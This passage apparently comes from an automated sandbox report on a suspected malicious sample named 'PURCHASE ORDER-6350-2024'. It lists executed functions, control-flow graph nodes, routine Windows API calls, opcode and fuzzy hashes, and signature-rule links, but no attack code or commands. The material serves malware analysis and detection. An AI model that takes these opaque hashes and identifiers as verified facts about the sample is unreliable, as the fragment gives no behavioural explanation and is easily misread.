47755->47757 47756->47755 47758 10ed693 GetCurrentThreadId 47757->47758 47759 10ed6c4 47758->47759

                                                  Executed Functions

                                                  Function 06DDD3D4 Relevance: .9, Instructions: 931COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2057685940.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6dd0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9faed6eb7ed7abb3590b7d875d7e42c7fdb4e8d478b6b3c2f5ee962c3396edaa
                                                  • Instruction ID: a81a02128a5f119603dd747b9552596eb821ada55383faf2871bb6b413f35c7e
                                                  • Opcode Fuzzy Hash: 9faed6eb7ed7abb3590b7d875d7e42c7fdb4e8d478b6b3c2f5ee962c3396edaa
                                                  • Instruction Fuzzy Hash: A7A22C31E006598FDB25DF68C8546EDB7B2FF89300F1486A9D80AA7351EB74AE85CF50
                                                  Function 06DD1340 Relevance: .7, Instructions: 651COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2057685940.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6dd0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4ebb98c8d01cb644ec6dcc4de64a23a3c66ab7d808541d44cc227c3a088bdb89
                                                  • Instruction ID: e6378fb4c388f0c06e6c643143c37003779deca57b5f9000fd0c27433aa371cf
                                                  • Opcode Fuzzy Hash: 4ebb98c8d01cb644ec6dcc4de64a23a3c66ab7d808541d44cc227c3a088bdb89
                                                  • Instruction Fuzzy Hash: D942E234B01210CFDBA8AF78C85866977FAFF89305B2454AEE607DB368DA35D841DB40
                                                  Function 06DD3A50 Relevance: .5, Instructions: 472COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2057685940.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6dd0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d7c08c117cf48825d2f58f2bdbf134b4e93cdf4b6a604d88cb67d6bb97a5985e
                                                  • Instruction ID: f3415bc5b0a91fcb7b60e8c5551b95039ad8db6da6fd04379bb523b52ebc0c40
                                                  • Opcode Fuzzy Hash: d7c08c117cf48825d2f58f2bdbf134b4e93cdf4b6a604d88cb67d6bb97a5985e
                                                  • Instruction Fuzzy Hash: AB223A30E10219CFCB64EF68D984A9DBBB6FF85300F1585A9E409AB265DB30ED85CF51
                                                  Function 010ED550 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 294 10ed550-10ed5ef GetCurrentProcess 298 10ed5f8-10ed62c GetCurrentThread 294->298 299 10ed5f1-10ed5f7 294->299 300 10ed62e-10ed634 298->300 301 10ed635-10ed669 GetCurrentProcess 298->301 299->298 300->301 303 10ed66b-10ed671 301->303 304 10ed672-10ed68d call 10ed72f 301->304 303->304 307 10ed693-10ed6c2 GetCurrentThreadId 304->307 308 10ed6cb-10ed72d 307->308 309 10ed6c4-10ed6ca 307->309 309->308
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 010ED5DE
                                                  • GetCurrentThread.KERNEL32 ref: 010ED61B
                                                  • GetCurrentProcess.KERNEL32 ref: 010ED658
                                                  • GetCurrentThreadId.KERNEL32 ref: 010ED6B1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2050801380.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10e0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: be135f16263416ca6295494a85b2ca66ce898b52f748ad3767083e35969b53ff
                                                  • Instruction ID: 94644a8218c3d4299f5809dc5f9465121e0186fcf32448b2708a55a1dd34b8a4
                                                  • Opcode Fuzzy Hash: be135f16263416ca6295494a85b2ca66ce898b52f748ad3767083e35969b53ff
                                                  • Instruction Fuzzy Hash: 805166B09003098FDB14DFAAD548BAEBFF1EF49304F208499D419A7360D7795944CF65
                                                  Function 010ED560 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 316 10ed560-10ed5ef GetCurrentProcess 320 10ed5f8-10ed62c GetCurrentThread 316->320 321 10ed5f1-10ed5f7 316->321 322 10ed62e-10ed634 320->322 323 10ed635-10ed669 GetCurrentProcess 320->323 321->320 322->323 325 10ed66b-10ed671 323->325 326 10ed672-10ed68d call 10ed72f 323->326 325->326 329 10ed693-10ed6c2 GetCurrentThreadId 326->329 330 10ed6cb-10ed72d 329->330 331 10ed6c4-10ed6ca 329->331 331->330
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 010ED5DE
                                                  • GetCurrentThread.KERNEL32 ref: 010ED61B
                                                  • GetCurrentProcess.KERNEL32 ref: 010ED658
                                                  • GetCurrentThreadId.KERNEL32 ref: 010ED6B1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2050801380.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10e0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 908be721fbfdf4ad46ac031c6cd6701230267dcab6b3afefffd2897ea8a3d02b
                                                  • Instruction ID: fcb450f211d27a5646c140a50ad89afac5bde57d64e1e1bbe90f88a7f1ea85b0
                                                  • Opcode Fuzzy Hash: 908be721fbfdf4ad46ac031c6cd6701230267dcab6b3afefffd2897ea8a3d02b
                                                  • Instruction Fuzzy Hash: D45155B09003098FEB14DFAAD548BAEBBF1FF89304F208459E019A73A0D7799944CF65
                                                  Function 06DC7C4F Relevance: 3.1, APIs: 2, Instructions: 83COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 410 6dc7c4f-6dc7c51 411 6dc7c31 410->411 412 6dc7c53-6dc7cbf GetSystemMetrics 410->412 413 6dc7c11-6dc7c12 411->413 414 6dc7c33-6dc7c4d 411->414 415 6dc7cc8-6dc7cf9 GetSystemMetrics 412->415 416 6dc7cc1-6dc7cc7 412->416 419 6dc7c19-6dc7c20 413->419 417 6dc7cfb-6dc7d01 415->417 418 6dc7d02-6dc7d22 415->418 416->415 417->418
                                                  APIs
                                                  • GetSystemMetrics.USER32(0000003B), ref: 06DC7CAE
                                                  • GetSystemMetrics.USER32(0000003C), ref: 06DC7CE8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2057650701.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6dc0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: MetricsSystem
                                                  • String ID:
                                                  • API String ID: 4116985748-0
                                                  • Opcode ID: 4cc58552fb9dc932af15c3b394bcd56bc65a30772115f8214cae37655c464e83
                                                  • Instruction ID: a2515811ce2a8e057fd761ca5017eb541296a1ffebacd61315a995df3e9cff5b
                                                  • Opcode Fuzzy Hash: 4cc58552fb9dc932af15c3b394bcd56bc65a30772115f8214cae37655c464e83
                                                  • Instruction Fuzzy Hash: 0F31B4B09003498FDB10CFA9D9493EEBFF0EB09324F10845AD159AB251C3795585CFA1
                                                  Function 06E16140 Relevance: 2.6, Strings: 2, Instructions: 71COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 586 6e16140-6e16153 587 6e16172-6e16192 586->587 589 6e1619a-6e161c5 587->589 593 6e16155-6e16158 589->593 594 6e16161-6e16170 593->594 595 6e1615a 593->595 594->593 595->587 595->594 596 6e161c7-6e161cd 595->596 598 6e161d1-6e161dd 596->598 599 6e161cf 596->599 600 6e161df-6e161ee 598->600 599->600 603 6e161f0-6e161f6 600->603 604 6e16206-6e16219 600->604 605 6e161f8 603->605 606 6e161fa-6e161fc 603->606 605->604 606->604
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8aq$8aq
                                                  • API String ID: 0-1589283582
                                                  • Opcode ID: 7fae6b2ee1373c0ff770c705372f0cf39485f0c8206b0d59fe518918ffe8a3a0
                                                  • Instruction ID: b32180ca7c00f0740bae826dc4d135907332b567274831851cf3443565003524
                                                  • Opcode Fuzzy Hash: 7fae6b2ee1373c0ff770c705372f0cf39485f0c8206b0d59fe518918ffe8a3a0
                                                  • Instruction Fuzzy Hash: 78210230B503189FE7949F699814AAB77EBABC9345B204439D60ADB386DE30CD058792
                                                  Function 010EAEB8 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 621 10eaeb8-10eaed7 622 10eaed9-10eaee6 call 10ea240 621->622 623 10eaf03-10eaf07 621->623 628 10eaefc 622->628 629 10eaee8 622->629 624 10eaf1b-10eaf5c 623->624 625 10eaf09-10eaf13 623->625 632 10eaf5e-10eaf66 624->632 633 10eaf69-10eaf77 624->633 625->624 628->623 676 10eaeee call 10eb150 629->676 677 10eaeee call 10eb160 629->677 632->633 635 10eaf9b-10eaf9d 633->635 636 10eaf79-10eaf7e 633->636 634 10eaef4-10eaef6 634->628 639 10eb038-10eb0f8 634->639 640 10eafa0-10eafa7 635->640 637 10eaf89 636->637 638 10eaf80-10eaf87 call 10ea24c 636->638 642 10eaf8b-10eaf99 637->642 638->642 671 10eb0fa-10eb0fd 639->671 672 10eb100-10eb12b GetModuleHandleW 639->672 643 10eafa9-10eafb1 640->643 644 10eafb4-10eafbb 640->644 642->640 643->644 646 10eafbd-10eafc5 644->646 647 10eafc8-10eafd1 call 10ea25c 644->647 646->647 652 10eafde-10eafe3 647->652 653 10eafd3-10eafdb 647->653 655 10eafe5-10eafec 652->655 656 10eb001-10eb00e 652->656 653->652 655->656 657 10eafee-10eaffe call 10ea26c call 10ea27c 655->657 662 10eb010-10eb02e 656->662 663 10eb031-10eb037 656->663 657->656 662->663 671->672 673 10eb12d-10eb133 672->673 674 10eb134-10eb148 672->674 673->674 676->634 677->634
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 010EB11E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2050801380.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10e0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 06ae7c398d138d27c13eaac7fc776d5c4a67c02042757d54900f8606a18bdb9f
                                                  • Instruction ID: ccc480e0b5ea41a4e53a3f7dbde09148d002e99e6382e7dc98074b42a2995744
                                                  • Opcode Fuzzy Hash: 06ae7c398d138d27c13eaac7fc776d5c4a67c02042757d54900f8606a18bdb9f
                                                  • Instruction Fuzzy Hash: 9E813570A00B458FDB65DF6AD44879ABBF1FF88300F00896DE49ADBA50D775E845CB90
                                                  Function 06E1F990 Relevance: 1.6, Strings: 1, Instructions: 369COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 678 6e1f990-6e1f9a7 681 6e1f9b0-6e1f9b6 678->681 682 6e1f9a9-6e1f9ae 678->682 683 6e1f9b9-6e1f9bd 681->683 682->683 684 6e1f9c6-6e1f9cc 683->684 685 6e1f9bf-6e1f9c4 683->685 686 6e1f9cf-6e1f9d3 684->686 685->686 687 6e1f9d5-6e1f9f2 686->687 688 6e1f9f7-6e1f9fb 686->688 699 6e1fc17-6e1fc20 687->699 689 6e1f9fd-6e1fa1a 688->689 690 6e1fa1f-6e1fa2a 688->690 689->699 692 6e1fa32-6e1fa38 690->692 693 6e1fa2c-6e1fa2f 690->693 694 6e1fc23-6e1fc32 692->694 695 6e1fa3e-6e1fa4e 692->695 693->692 704 6e1fc34-6e1fc39 694->704 705 6e1fc3a-6e1fc3e 694->705 702 6e1fa50-6e1fa6e 695->702 703 6e1fa73-6e1fa98 695->703 711 6e1fbd7-6e1fbda 702->711 714 6e1fbe0-6e1fbe5 703->714 715 6e1fa9e-6e1faa7 703->715 704->705 708 6e1fc40-6e1fc43 705->708 709 6e1fc46-6e1fec6 705->709 708->709 711->714 711->715 714->694 716 6e1fbe7-6e1fbea 714->716 715->694 717 6e1faad-6e1fac5 715->717 720 6e1fbec 716->720 721 6e1fbee-6e1fbf1 716->721 724 6e1fad7-6e1faee 717->724 725 6e1fac7-6e1facc 717->725 720->699 721->694 723 6e1fbf3-6e1fc15 721->723 723->699 733 6e1faf0 724->733 734 6e1faf6-6e1fb00 724->734 725->694 728 6e1fad2-6e1fad5 725->728 728->724 729 6e1fb05-6e1fb0a 728->729 729->694 735 6e1fb10-6e1fb1f 729->735 733->734 734->714 741 6e1fb21 735->741 742 6e1fb27-6e1fb37 735->742 741->742 742->694 745 6e1fb3d-6e1fb40 742->745 745->694 746 6e1fb46-6e1fb49 745->746 748 6e1fb4b-6e1fb4f 746->748 749 6e1fb9a-6e1fbac 746->749 748->694 750 6e1fb55-6e1fb5b 748->750 749->711 755 6e1fbae-6e1fbc3 749->755 753 6e1fb5d-6e1fb63 750->753 754 6e1fb6c-6e1fb72 750->754 753->694 756 6e1fb69 753->756 754->694 757 6e1fb78-6e1fb84 754->757 762 6e1fbc5 755->762 763 6e1fbcb-6e1fbd5 755->763 756->754 764 6e1fb8c-6e1fb98 757->764 762->763 763->714 764->749
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q
                                                  • API String ID: 0-1259897404
                                                  • Opcode ID: a8d1968082d24ce1d53eb2aa1bd3a82d420c238bfa2aecb6eb85ba2838d4c179
                                                  • Instruction ID: 64f6c3cb56d9a9bf9d127463e64c94a8a1ab100d7a6e26c701e5f040dfead626
                                                  • Opcode Fuzzy Hash: a8d1968082d24ce1d53eb2aa1bd3a82d420c238bfa2aecb6eb85ba2838d4c179
                                                  • Instruction Fuzzy Hash: B8E18030A00309DFDB45EFA9D550AAEBBF6FF88300F108469D805AB369CB359D46DB95
                                                  Function 06DDA290 Relevance: 1.6, APIs: 1, Instructions: 107timeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 793 6dda290-6dda29c 794 6dda22e-6dda243 793->794 795 6dda29e-6dda2b6 793->795 796 6dda24d-6dda26a SetTimer 794->796 797 6dda245-6dda248 794->797 802 6dda2bc-6dda2cd 795->802 803 6dda353-6dda357 795->803 799 6dda26c-6dda272 796->799 800 6dda273-6dda287 796->800 797->796 799->800 806 6dda2cf-6dda2d8 802->806 807 6dda2da 802->807 808 6dda2dc-6dda2e1 806->808 807->808 809 6dda358-6dda3d9 808->809 810 6dda2e3-6dda2e6 808->810 828 6dda3db-6dda3e5 809->828 829 6dda3e6-6dda408 809->829 811 6dda2e8-6dda2eb 810->811 812 6dda2f2-6dda314 810->812 811->812 813 6dda2ed-6dda2f0 811->813 815 6dda325-6dda34e 812->815 824 6dda316-6dda31f 812->824 813->812 813->815 815->803 824->815 831 6dda40a-6dda40c 829->831 832 6dda416-6dda41e 829->832 831->832
                                                  APIs
                                                  • SetTimer.USER32(?,01106428,?,?,?,?,?,?,06DDA0B0,00000000,00000000,?), ref: 06DDA25D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2057685940.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6dd0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: Timer
                                                  • String ID:
                                                  • API String ID: 2870079774-0
                                                  • Opcode ID: b921c29ba07e56f4de4ed1ce85ec305097000be058c73190b4618c49b3a6db1b
                                                  • Instruction ID: 79d32211b651189c6af6ef0884e2789b2f1ad2205afc34a4ba0155e5a4462459
                                                  • Opcode Fuzzy Hash: b921c29ba07e56f4de4ed1ce85ec305097000be058c73190b4618c49b3a6db1b
                                                  • Instruction Fuzzy Hash: B1311631A05200CFDB21EF6AD444AA9BFF1EF86314F1980AAD444DB362C675E845CBA1
                                                  Function 010E591C Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 833 10e591c-10e59e9 CreateActCtxA 835 10e59eb-10e59f1 833->835 836 10e59f2-10e5a4c 833->836 835->836 843 10e5a4e-10e5a51 836->843 844 10e5a5b-10e5a5f 836->844 843->844 845 10e5a70 844->845 846 10e5a61-10e5a6d 844->846 848 10e5a71 845->848 846->845 848->848
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 010E59D9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2050801380.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10e0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 08005f28129610484daa48c1beee2565119964a9c8bb51a0e5b42f3212720acf
                                                  • Instruction ID: e49f8c217628a1fe803ccf2117cb8a4ec60656a4fdad9b395787803a27aa08a7
                                                  • Opcode Fuzzy Hash: 08005f28129610484daa48c1beee2565119964a9c8bb51a0e5b42f3212720acf
                                                  • Instruction Fuzzy Hash: 8F4122B4C00319CEDB24CFAAC888BDEBBF1BF49304F24809AD059AB250DB751946CF51
                                                  Function 010E5A94 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 849 10e5a94-10e5b24
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2050801380.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10e0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cb1c4cc02b15feed7bfca8bf0b839ea2dbfcc9f9ed53bb13d5d184d3ce87f440
                                                  • Instruction ID: 6a8e47591a7c79ef791b2a4787fd1e71cfe5ae4f8b483dc56cb955114666d86d
                                                  • Opcode Fuzzy Hash: cb1c4cc02b15feed7bfca8bf0b839ea2dbfcc9f9ed53bb13d5d184d3ce87f440
                                                  • Instruction Fuzzy Hash: 0731DF79804349CFDB12CBA9C8587EDBFF0AF46318F14848AC495AB256C775580ACF51
                                                  Function 010E4514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 010E59D9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2050801380.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10e0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 60080554b34612627cabf96a95f239597762160d11a1fb83ac8af28a58e3be43
                                                  • Instruction ID: 425c513d5f278dee0c6905cf494009a53dc30643bedfcb60a5824944903a3ee5
                                                  • Opcode Fuzzy Hash: 60080554b34612627cabf96a95f239597762160d11a1fb83ac8af28a58e3be43
                                                  • Instruction Fuzzy Hash: F54103B4C00719CEDB24CFAAC848BDEBBF5BF49304F20805AD419AB250DB755946CF91
                                                  Function 010ED7A0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010ED82F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2050801380.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10e0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: ab3a15b9c01173b66ffcfd7a60ef82441ef55e3a8161b1842e31319ac5ab3576
                                                  • Instruction ID: 24ac44da308da00193a58671af9ee95d3650ae28cc1961041269ff542f98f88a
                                                  • Opcode Fuzzy Hash: ab3a15b9c01173b66ffcfd7a60ef82441ef55e3a8161b1842e31319ac5ab3576
                                                  • Instruction Fuzzy Hash: BB21E3B59002089FDB10CFAAD584ADEBFF5FB48310F14805AE958A3350D379A944CFA1
                                                  Function 010ED7A8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010ED82F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2050801380.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10e0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 9bba9b9da3f5f418f0702292caa9c1b23762a300aa4a0a75f0633476ba35bdfa
                                                  • Instruction ID: 5a7224a81fbfcc352021cd028b82e55ffdb43a654f73db3c3a0fd9a0f9b78520
                                                  • Opcode Fuzzy Hash: 9bba9b9da3f5f418f0702292caa9c1b23762a300aa4a0a75f0633476ba35bdfa
                                                  • Instruction Fuzzy Hash: 5821E2B59002089FDB10CFAAD984ADEBFF9FB48310F14805AE918A3350D379A940CFA0
                                                  Function 06DDA1F8 Relevance: 1.5, APIs: 1, Instructions: 48timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetTimer.USER32(?,01106428,?,?,?,?,?,?,06DDA0B0,00000000,00000000,?), ref: 06DDA25D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2057685940.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6dd0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: Timer
                                                  • String ID:
                                                  • API String ID: 2870079774-0
                                                  • Opcode ID: a672ceae1e34f72cb14c12c93e33e791fe7c07bd731ebd9fbe3877f65de31717
                                                  • Instruction ID: 262b6cd5c1a294bf0a128492a2375958d6328de33280bde6865159690c6ea913
                                                  • Opcode Fuzzy Hash: a672ceae1e34f72cb14c12c93e33e791fe7c07bd731ebd9fbe3877f65de31717
                                                  • Instruction Fuzzy Hash: 7C11E3B5800248DFCB20DF9AD845BDEBFF8FB48314F24841AD958A3200D379A584CFA1
                                                  Function 06DC2BD1 Relevance: 1.5, APIs: 1, Instructions: 48timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2057650701.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6dc0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: ClickDoubleTime
                                                  • String ID:
                                                  • API String ID: 590776121-0
                                                  • Opcode ID: 550b279e3a0b5ca807cbea62bd9d338c1e64e0f55c124bd41b4f435092186adb
                                                  • Instruction ID: 1eb84a338be4c7f43e953669df4c813c7e92022e40ee0de75c28769da87659a2
                                                  • Opcode Fuzzy Hash: 550b279e3a0b5ca807cbea62bd9d338c1e64e0f55c124bd41b4f435092186adb
                                                  • Instruction Fuzzy Hash: E911C0759043498FCB22DFA9E4043DEBFF4EF45324F1480AAC499A7252C2395645CBA1
                                                  Function 06DD88D8 Relevance: 1.5, APIs: 1, Instructions: 47timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetTimer.USER32(?,01106428,?,?,?,?,?,?,06DDA0B0,00000000,00000000,?), ref: 06DDA25D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2057685940.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6dd0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: Timer
                                                  • String ID:
                                                  • API String ID: 2870079774-0
                                                  • Opcode ID: a2be36279fbc2e4ef3434268fa2796ff0b18b37c99df366822b61a3dc8ce000f
                                                  • Instruction ID: d1535c51e7a291d403c14babeb42b5cc68ece83c858d8416ca2795181de2969f
                                                  • Opcode Fuzzy Hash: a2be36279fbc2e4ef3434268fa2796ff0b18b37c99df366822b61a3dc8ce000f
                                                  • Instruction Fuzzy Hash: DE11E3B58003489FDB20DF9AD844BDEBFF8EB48314F14845AE518A7210C379A944CFA5
                                                  Function 010EB0B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 010EB11E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2050801380.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10e0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 8fe630084029f54d3919b4a10c12beeed5b2336b5bb645dca23cd0662d01aea2
                                                  • Instruction ID: 956b2c561dc512aac932e5c81c29421f49d211ac41aeca67aa3c14fdc908bdaf
                                                  • Opcode Fuzzy Hash: 8fe630084029f54d3919b4a10c12beeed5b2336b5bb645dca23cd0662d01aea2
                                                  • Instruction Fuzzy Hash: AE1110B5C002498FDB10DF9AD848ADEFBF5EF88324F10845AD568A7210C379A545CFA1
                                                  Function 06E10040 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (aq
                                                  • API String ID: 0-600464949
                                                  • Opcode ID: addf3fb717a84f623dd6bb252665c732708fe37d503a3bcc195949c6de43ea0f
                                                  • Instruction ID: ba3327559862e0f91703673a5fea34496104f84336f8ce5f8b3828f45effaf55
                                                  • Opcode Fuzzy Hash: addf3fb717a84f623dd6bb252665c732708fe37d503a3bcc195949c6de43ea0f
                                                  • Instruction Fuzzy Hash: EA418131B002059FDB55DF69C8646EEBAE6FF88210F108929E806DB390DF75DD45C751
                                                  Function 06E1ABE0 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Te]q
                                                  • API String ID: 0-52440209
